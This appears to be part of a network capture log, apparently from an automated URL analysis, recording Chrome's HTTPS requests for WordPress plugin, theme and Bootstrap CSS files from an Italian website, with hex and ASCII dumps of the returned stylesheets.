                                                                                                                                          2024-11-28 10:32:49 UTC8000INData Raw: 7d 2e 74 61 69 6c 6f 72 2d 75 69 20 2e 64 65 73 6b 74 6f 70 2d 63 6f 6c 75 6d 6e 73 20 2e 74 61 69 6c 6f 72 2d 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 72 65 6d 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 61 69 6c 6f 72 2d 75 69 20 2e 64 65 73 6b 74 6f 70 2d 63 6f 6c 75 6d 6e 73 20 2e 74 61 69 6c 6f 72 2d 63 6f 6c 75 6d 6e 20 3e 20 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30
                                                                                                                                          Data Ascii: }.tailor-ui .desktop-columns .tailor-column{padding-left:1rem;padding-right:1rem;display:-webkit-flex;display:-ms-flexbox;display:flex;-ms-flex-direction:column;flex-direction:column}.tailor-ui .desktop-columns .tailor-column > :last-child{margin-bottom:0
                                                                                                                                          2024-11-28 10:32:50 UTC8000INData Raw: 65 72 2d 74 6f 70 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 2e 74 61 69 6c 6f 72 2d 75 69 20 2e 74 61 69 6c 6f 72 2d 67 72 69 64 2d 2d 74 61 62 6c 65 74 2e 74 61 69 6c 6f 72 2d 67 72 69 64 2d 2d 62 6f 72 64 65 72 65 64 2e 74 61 69 6c 6f 72 2d 67 72 69 64 2d 2d 32 20 3e 20 2e 74 61 69 6c 6f 72 2d 67 72 69 64 5f 5f 69 74 65 6d 3a 6e 74 68 2d 63 68 69 6c 64 28 20 32 6e 20 2b 20 31 29 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 2e 74 61 69 6c 6f 72 2d 75 69 20 2e 74 61 69 6c 6f 72 2d 67 72 69 64 2d 2d 74 61 62 6c 65 74 2e 74 61 69 6c 6f 72 2d 67 72 69 64 2d 2d 33 20 3e 20 2e 74 61 69 6c 6f 72 2d 67 72 69 64 5f 5f 69 74 65 6d 7b 77 69 64 74 68 3a 33 33 2e 33 33 33 33 33 25 7d 2e 74 61 69 6c 6f 72 2d 75 69 20 2e 74 61 69 6c 6f 72 2d
                                                                                                                                          Data Ascii: er-top-style:solid}.tailor-ui .tailor-grid--tablet.tailor-grid--bordered.tailor-grid--2 > .tailor-grid__item:nth-child( 2n + 1){border-left-style:solid}.tailor-ui .tailor-grid--tablet.tailor-grid--3 > .tailor-grid__item{width:33.33333%}.tailor-ui .tailor-
                                                                                                                                          2024-11-28 10:32:50 UTC8000INData Raw: 5f 74 69 74 6c 65 7b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 7d 2e 74 61 69 6c 6f 72 2d 75 69 20 2e 74 61 69 6c 6f 72 2d 70 6f 73 74 73 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 6e 6f 6e 65 20 23 65 66 65 66 65 66 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 7d 2e 74 61 69 6c 6f 72 2d 75 69 20 2e 74 61 69 6c 6f 72 2d 70 6f 73 74 73 20 2e 65 6e 74 72 79 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 35 72 65 6d 7d 2e 74 61 69 6c 6f 72 2d
                                                                                                                                          Data Ascii: _title{pointer-events:none}.tailor-ui .tailor-posts{padding:0;margin-bottom:1rem;font-size:1em;color:inherit;background-color:transparent;border:1px none #efefef;border-radius:0;box-shadow:none}.tailor-ui .tailor-posts .entry{margin-bottom:1.5rem}.tailor-
                                                                                                                                          2024-11-28 10:32:50 UTC8000INData Raw: 20 69 6d 67 7b 77 69 64 74 68 3a 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 31 30 30 25 7d 2e 74 61 69 6c 6f 72 2d 75 69 20 2e 61 73 70 65 63 74 2d 72 61 74 69 6f 2d 31 36 2d 39 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 74 61 69 6c 6f 72 2d 75 69 20 2e 61 73 70 65 63 74 2d 72 61 74 69 6f 2d 31 36 2d 39 3a 3a 62 65 66 6f 72 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 63 6f 6e 74 65 6e 74 3a 22 20 22 3b 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 35 36 2e 32 35 25 7d 2e 74 61 69 6c 6f 72 2d 75 69 20 2e 61 73 70 65 63 74 2d 72 61 74 69 6f 2d 31 36 2d 39 2e 69 73 2d 73 74 72 65 74 63 68 65 64 20 69 6d 67 7b 6d 69 6e 2d 68 65 69
                                                                                                                                          Data Ascii: img{width:auto;max-width:none;height:100%}.tailor-ui .aspect-ratio-16-9{position:relative;overflow:hidden}.tailor-ui .aspect-ratio-16-9::before{display:block;content:" ";width:100%;padding-top:56.25%}.tailor-ui .aspect-ratio-16-9.is-stretched img{min-hei
                                                                                                                                          2024-11-28 10:32:50 UTC8000INData Raw: 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 31 70 78 29 7d 2e 74 61 69 6c 6f 72 2d 75 69 20 2e 6d 66 70 2d 61 72 72 6f 77 3a 68 6f 76 65 72 2c 2e 74 61 69 6c 6f 72 2d 75 69 20 2e 6d 66 70 2d 61 72 72 6f 77 3a 66 6f 63 75 73 7b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 74 65 72 3a 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 31 30 30 29 7d 2e 74 61 69 6c 6f 72 2d 75 69 20 2e 6d 66 70 2d 61 72 72 6f 77 3a 3a 62 65 66 6f 72 65 2c 2e 74 61 69 6c 6f 72 2d 75 69 20 2e 6d 66 70 2d 61 72 72 6f 77 3a 3a 61 66 74 65 72 2c 2e 74 61 69 6c 6f 72 2d 75 69 20 2e 6d 66 70 2d 61 72 72 6f 77 20 2e 6d 66 70 2d 62 2c 2e 74 61 69 6c 6f 72 2d 75 69 20 2e 6d 66 70 2d 61 72 72 6f 77 20 2e 6d 66 70 2d 61 7b 63 6f 6e 74 65 6e 74 3a 27 27 3b 64 69 73 70 6c 61 79 3a 62 6c
                                                                                                                                          Data Ascii: ransform:translateY(1px)}.tailor-ui .mfp-arrow:hover,.tailor-ui .mfp-arrow:focus{opacity:1;filter:alpha(opacity=100)}.tailor-ui .mfp-arrow::before,.tailor-ui .mfp-arrow::after,.tailor-ui .mfp-arrow .mfp-b,.tailor-ui .mfp-arrow .mfp-a{content:'';display:bl
                                                                                                                                          2024-11-28 10:32:50 UTC108INData Raw: 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 6f 75 74 6c 69 6e 65 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2e 74 61 69 6c 6f 72 2d 75 69 20 2e 69 73 2d 68 69 64 64 65 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d
                                                                                                                                          Data Ascii: -border-radius:0;border-radius:0;outline:0;padding:0;margin:0}.tailor-ui .is-hidden{display:none !important}


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          38192.168.2.4497955.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:48 UTC622OUTGET /wp-content/plugins/wpcf7-redirect/build/css/wpcf7-redirect-frontend.min.css?ver=1.1 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:49 UTC300INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:49 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Mon, 11 Nov 2024 19:05:33 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 316
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:32:49 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/css
                                                                                                                                          2024-11-28 10:32:49 UTC316INData Raw: 2e 70 6f 70 75 70 2d 74 65 6d 70 6c 61 74 65 20 2e 6d 6f 64 61 6c 20 7b 0d 0d 0a 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0d 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 32 35 30 6d 73 20 65 61 73 65 3b 0d 0d 0a 20 20 2d 6f 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 32 35 30 6d 73 20 65 61 73 65 3b 0d 0d 0a 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 32 35 30 6d 73 20 65 61 73 65 3b 0d 0d 0a 7d 0d 0d 0a 0d 0d 0a 2e 70 6f 70 75 70 2d 74 65 6d 70 6c 61 74 65 20 2e 6d 6f 64 61 6c 2e 69 73 2d 6f 70 65 6e 20 7b 0d 0d 0a 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0d 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 32 35 30 6d 73 20 65 61 73 65 3b 0d 0d 0a 20 20 2d 6f 2d 74 72
                                                                                                                                          Data Ascii: .popup-template .modal { opacity: 0; -webkit-transition: all 250ms ease; -o-transition: all 250ms ease; transition: all 250ms ease;}.popup-template .modal.is-open { opacity: 1; -webkit-transition: all 250ms ease; -o-tr


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          39192.168.2.4497965.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:50 UTC619OUTGET /wp-content/plugins/multilingual-press/assets/css/frontend.min.css?ver=1566305675 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:51 UTC300INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:50 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Tue, 20 Aug 2019 12:54:35 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 383
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:32:50 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/css
                                                                                                                                          2024-11-28 10:32:51 UTC383INData Raw: 2e 6d 6c 70 2d 71 75 69 63 6b 6c 69 6e 6b 73 2e 62 6c 3a 61 66 74 65 72 2c 2e 6d 6c 70 2d 71 75 69 63 6b 6c 69 6e 6b 73 2e 62 72 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 27 27 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 63 6c 65 61 72 3a 62 6f 74 68 7d 2e 6d 6c 70 2d 6c 61 6e 67 75 61 67 65 2d 62 6f 78 20 75 6c 20 6c 69 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6d 61 72 67 69 6e 3a 30 20 35 70 78 20 30 20 30 3b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 6e 6f 6e 65 7d 2e 6d 6c 70 2d 71 75 69 63 6b 6c 69 6e 6b 73 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 65 6d 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 7d 2e 6d 6c 70 2d 71 75 69 63 6b 6c 69 6e 6b 73 2e 62 6c 2c 2e 6d 6c 70 2d 71 75 69 63 6b 6c 69 6e 6b 73 2e 74 6c 7b 66 6c 6f 61 74 3a 6c 65 66 74
                                                                                                                                          Data Ascii: .mlp-quicklinks.bl:after,.mlp-quicklinks.br:after{content:'';display:table;clear:both}.mlp-language-box ul li{display:inline;margin:0 5px 0 0;list-style-type:none}.mlp-quicklinks{max-width:10em;padding:10px}.mlp-quicklinks.bl,.mlp-quicklinks.tl{float:left


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          40192.168.2.4497975.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:51 UTC601OUTGET /wp-content/themes/tentamus/dist/styles/main.css?ver=2001211040 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:52 UTC303INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:51 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Tue, 11 Oct 2022 13:14:48 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 145640
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:32:51 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/css
                                                                                                                                          2024-11-28 10:32:52 UTC7889INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 2d 61 6c 70 68 61 2e 34 20 28 68 74 74 70 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 36 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 36 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 0a 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63
                                                                                                                                          Data Ascii: @charset "UTF-8";/*! * Bootstrap v4.0.0-alpha.4 (http://getbootstrap.com) * Copyright 2011-2016 The Bootstrap Authors * Copyright 2011-2016 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) *//*! normalize.c
                                                                                                                                          2024-11-28 10:32:52 UTC8000INData Raw: 77 69 64 74 68 3a 31 30 30 25 7d 2e 70 75 6c 6c 2d 78 73 2d 30 7b 72 69 67 68 74 3a 61 75 74 6f 7d 2e 70 75 6c 6c 2d 78 73 2d 31 7b 72 69 67 68 74 3a 38 2e 33 33 33 33 33 33 33 33 33 33 25 7d 2e 70 75 6c 6c 2d 78 73 2d 32 7b 72 69 67 68 74 3a 31 36 2e 36 36 36 36 36 36 36 36 36 37 25 7d 2e 70 75 6c 6c 2d 78 73 2d 33 7b 72 69 67 68 74 3a 32 35 25 7d 2e 70 75 6c 6c 2d 78 73 2d 34 7b 72 69 67 68 74 3a 33 33 2e 33 33 33 33 33 33 33 33 33 33 25 7d 2e 70 75 6c 6c 2d 78 73 2d 35 7b 72 69 67 68 74 3a 34 31 2e 36 36 36 36 36 36 36 36 36 37 25 7d 2e 70 75 6c 6c 2d 78 73 2d 36 7b 72 69 67 68 74 3a 35 30 25 7d 2e 70 75 6c 6c 2d 78 73 2d 37 7b 72 69 67 68 74 3a 35 38 2e 33 33 33 33 33 33 33 33 33 33 25 7d 2e 70 75 6c 6c 2d 78 73 2d 38 7b 72 69 67 68 74 3a 36 36 2e 36
                                                                                                                                          Data Ascii: width:100%}.pull-xs-0{right:auto}.pull-xs-1{right:8.3333333333%}.pull-xs-2{right:16.6666666667%}.pull-xs-3{right:25%}.pull-xs-4{right:33.3333333333%}.pull-xs-5{right:41.6666666667%}.pull-xs-6{right:50%}.pull-xs-7{right:58.3333333333%}.pull-xs-8{right:66.6
                                                                                                                                          2024-11-28 10:32:52 UTC8000INData Raw: 25 7d 2e 70 75 6c 6c 2d 78 6c 2d 31 32 7b 72 69 67 68 74 3a 31 30 30 25 7d 2e 70 75 73 68 2d 78 6c 2d 30 7b 6c 65 66 74 3a 61 75 74 6f 7d 2e 70 75 73 68 2d 78 6c 2d 31 7b 6c 65 66 74 3a 38 2e 33 33 33 33 33 33 33 33 33 33 25 7d 2e 70 75 73 68 2d 78 6c 2d 32 7b 6c 65 66 74 3a 31 36 2e 36 36 36 36 36 36 36 36 36 37 25 7d 2e 70 75 73 68 2d 78 6c 2d 33 7b 6c 65 66 74 3a 32 35 25 7d 2e 70 75 73 68 2d 78 6c 2d 34 7b 6c 65 66 74 3a 33 33 2e 33 33 33 33 33 33 33 33 33 33 25 7d 2e 70 75 73 68 2d 78 6c 2d 35 7b 6c 65 66 74 3a 34 31 2e 36 36 36 36 36 36 36 36 36 37 25 7d 2e 70 75 73 68 2d 78 6c 2d 36 7b 6c 65 66 74 3a 35 30 25 7d 2e 70 75 73 68 2d 78 6c 2d 37 7b 6c 65 66 74 3a 35 38 2e 33 33 33 33 33 33 33 33 33 33 25 7d 2e 70 75 73 68 2d 78 6c 2d 38 7b 6c 65 66 74
                                                                                                                                          Data Ascii: %}.pull-xl-12{right:100%}.push-xl-0{left:auto}.push-xl-1{left:8.3333333333%}.push-xl-2{left:16.6666666667%}.push-xl-3{left:25%}.push-xl-4{left:33.3333333333%}.push-xl-5{left:41.6666666667%}.push-xl-6{left:50%}.push-xl-7{left:58.3333333333%}.push-xl-8{left
                                                                                                                                          2024-11-28 10:32:52 UTC8000INData Raw: 64 61 72 79 3a 68 6f 76 65 72 2c 2e 6f 70 65 6e 3e 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 73 65 63 6f 6e 64 61 72 79 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 63 63 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 63 63 63 7d 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 73 65 63 6f 6e 64 61 72 79 2e 61 63 74 69 76 65 2e 66 6f 63 75 73 2c 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 73 65 63 6f 6e 64 61 72 79 2e 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 73 65 63 6f 6e 64 61 72 79 2e 61 63 74 69 76 65 3a 68 6f 76 65 72 2c 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 73 65 63 6f 6e 64 61 72 79 3a 61 63 74 69 76 65 2e 66 6f 63 75 73 2c 2e 62 74 6e
                                                                                                                                          Data Ascii: dary:hover,.open>.btn-outline-secondary.dropdown-toggle{color:#fff;background-color:#ccc;border-color:#ccc}.btn-outline-secondary.active.focus,.btn-outline-secondary.active:focus,.btn-outline-secondary.active:hover,.btn-outline-secondary:active.focus,.btn
                                                                                                                                          2024-11-28 10:32:52 UTC8000INData Raw: 7b 7a 2d 69 6e 64 65 78 3a 32 7d 2e 62 74 6e 2d 67 72 6f 75 70 20 2e 62 74 6e 2b 2e 62 74 6e 2c 2e 62 74 6e 2d 67 72 6f 75 70 20 2e 62 74 6e 2b 2e 62 74 6e 2d 67 72 6f 75 70 2c 2e 62 74 6e 2d 67 72 6f 75 70 20 2e 62 74 6e 2d 67 72 6f 75 70 2b 2e 62 74 6e 2c 2e 62 74 6e 2d 67 72 6f 75 70 20 2e 62 74 6e 2d 67 72 6f 75 70 2b 2e 62 74 6e 2d 67 72 6f 75 70 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 31 70 78 7d 2e 62 74 6e 2d 74 6f 6f 6c 62 61 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 2e 35 72 65 6d 7d 2e 62 74 6e 2d 74 6f 6f 6c 62 61 72 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 63 6c 65 61 72 3a 62 6f 74 68 7d 2e 62 74 6e 2d 74 6f 6f 6c 62 61 72 20 2e 62 74 6e 2d 67 72 6f 75 70 2c 2e 62 74 6e 2d 74 6f 6f
                                                                                                                                          Data Ascii: {z-index:2}.btn-group .btn+.btn,.btn-group .btn+.btn-group,.btn-group .btn-group+.btn,.btn-group .btn-group+.btn-group{margin-left:-1px}.btn-toolbar{margin-left:-.5rem}.btn-toolbar:after{content:"";display:table;clear:both}.btn-toolbar .btn-group,.btn-too
                                                                                                                                          2024-11-28 10:32:52 UTC8000INData Raw: 33 43 2f 73 76 67 25 33 45 22 29 7d 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 73 2d 73 74 61 63 6b 65 64 20 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 73 2d 73 74 61 63 6b 65 64 20 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 3a 61 66 74 65 72 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 32 35 72 65 6d 3b 63 6f 6e 74 65 6e 74 3a 22 22 7d 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 73 2d 73 74 61 63 6b 65 64 20 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2b 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 2e 63 75 73 74 6f 6d 2d 73 65 6c 65 63 74 7b 64 69 73 70 6c 61 79 3a
                                                                                                                                          Data Ascii: 3C/svg%3E")}.custom-controls-stacked .custom-control{display:inline}.custom-controls-stacked .custom-control:after{display:block;margin-bottom:.25rem;content:""}.custom-controls-stacked .custom-control+.custom-control{margin-left:0}.custom-select{display:
                                                                                                                                          2024-11-28 10:32:52 UTC8000INData Raw: 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2e 64 69 73 61 62 6c 65 64 2c 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2e 64 69 73 61 62 6c 65 64 3a 66 6f 63 75 73 2c 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2e 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 7b 63
                                                                                                                                          Data Ascii: op-right-radius:.25rem;border-top-left-radius:.25rem}.list-group-item:last-child{margin-bottom:0;border-bottom-right-radius:.25rem;border-bottom-left-radius:.25rem}.list-group-item.disabled,.list-group-item.disabled:focus,.list-group-item.disabled:hover{c
                                                                                                                                          2024-11-28 10:32:52 UTC8000INData Raw: 2e 66 6c 65 78 2d 69 74 65 6d 73 2d 6d 64 2d 6d 69 64 64 6c 65 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 66 6c 65 78 2d 69 74 65 6d 73 2d 6d 64 2d 62 6f 74 74 6f 6d 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 65 6e 64 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70 78 29 7b 2e 66 6c 65 78 2d 6d 64 2d 74 6f 70 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 7d 2e 66 6c 65 78 2d 6d 64 2d 6d 69 64 64 6c 65 7b 2d 6d 73 2d 67 72 69 64 2d 72 6f 77 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 73 65 6c 66 3a 63 65 6e 74 65 72 7d 2e 66 6c 65 78 2d 6d 64 2d 62 6f 74 74 6f 6d 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 65 6e 64 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77
                                                                                                                                          Data Ascii: .flex-items-md-middle{align-items:center}.flex-items-md-bottom{align-items:flex-end}}@media (min-width:768px){.flex-md-top{align-self:flex-start}.flex-md-middle{-ms-grid-row-align:center;align-self:center}.flex-md-bottom{align-self:flex-end}}@media (min-w
